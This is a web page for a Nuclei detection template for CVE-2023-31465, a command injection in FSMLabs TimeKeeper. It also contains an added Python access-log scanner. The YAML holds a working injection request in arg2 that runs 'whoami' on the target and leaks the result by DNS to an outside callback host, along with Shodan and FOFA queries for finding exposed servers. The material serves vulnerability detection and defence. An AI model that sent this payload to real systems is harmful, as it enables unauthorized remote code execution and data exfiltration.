TimeKeeper by FSMLabs - Remote Code Execution
ID: CVE-2023-31465
Severity: critical
Author: ritikchaddha
Tags: cve,cve2023,timekeeper,rce,oast,fsmlabs
Description
An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
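As an added defensive example (not part of the template, the vendor's code, or the original page), the following Python scans web-server access-log lines for getsamplebacklog requests whose arg2 payload does not look like a legitimate one: in a normal request the earliest and latest fields are numeric timestamps, so a non-numeric value there, or shell metacharacters in any arg[x] parameter, is an indicator of attempted injection. The log lines are constructed, and the combined access-log layout is an assumption.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the page): the first is a
# normal getsamplebacklog request, the second carries a non-numeric "earliest".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /getsamplebacklog?arg1=abc&arg2=%7B%22type%22%3A%22client%22%2C%22earliest%22%3A%221676976316.328%22%2C%22latest%22%3A1676976916.328%2C%22seriesID%22%3A3%7D HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /getsamplebacklog?arg1=abc&arg2=%7B%22type%22%3A%22client%22%2C%22earliest%22%3A%221676976316.328%7C%7Cx%22%2C%22latest%22%3A1676976916.328%2C%22seriesID%22%3A3%7D HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TIMESTAMP_RE = re.compile(r"^\d+(\.\d+)?$")  # what earliest/latest should look like
SHELL_META_RE = re.compile(r"[|;&`$]")      # characters a timestamp never needs

def check_request(target):
    """Return findings for one request target; an empty list means nothing suspicious."""
    parts = urlsplit(target)
    if parts.path != "/getsamplebacklog":
        return []
    query = parse_qs(parts.query)  # percent-decodes every arg[x] value
    findings = []
    for name, values in query.items():
        for value in values:
            if SHELL_META_RE.search(value):
                findings.append(f"{name}: shell metacharacters")
    arg2 = query.get("arg2", [None])[0]
    if arg2 is not None:
        try:
            payload = json.loads(arg2)
        except ValueError:
            payload = None
        if not isinstance(payload, dict):
            findings.append("arg2: not a JSON object")
        else:
            for key in ("earliest", "latest"):
                value = payload.get(key)
                if value is not None and not TIMESTAMP_RE.match(str(value)):
                    findings.append(f"arg2.{key}: non-numeric timestamp {value!r}")
    return findings

def scan_log(text):
    """Return (line number, findings) for every suspicious request in an access log."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = check_request(match.group("target"))
            if findings:
                hits.append((lineno, findings))
    return hits
```

Running scan_log over a real log will flag only line 2 of the sample above; the arg2 JSON check is what distinguishes a tampered request from one that merely contains an odd character elsewhere.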
YAML Source
id: CVE-2023-31465

info:
  name: TimeKeeper by FSMLabs - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
  reference:
    - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-31465
    - https://fsmlabs.com/fsmlabs-cybersecurity/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-31465
    epss-score: 0.0156
    epss-percentile: 0.87192
    cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fsmlabs
    product: timekeeper
    shodan-query: http.favicon.hash:2134367771
    fofa-query: icon_hash=2134367771
  tags: cve,cve2023,timekeeper,rce,oast,fsmlabs

http:
  - raw:
      - |
        GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"seriesID":'
# digest: 4a0a00473045022069f9d0e80bb6da841b4120e78f723ad858f778a0add069a4be95f542b44b5a78022100888e8972d6df118d7781dd4c02842bd13f48cf930d9552620ea065646597f43c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the issue described above in a target web application. Run it with the Nuclei scanner against the URL to check:
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-31465.yaml"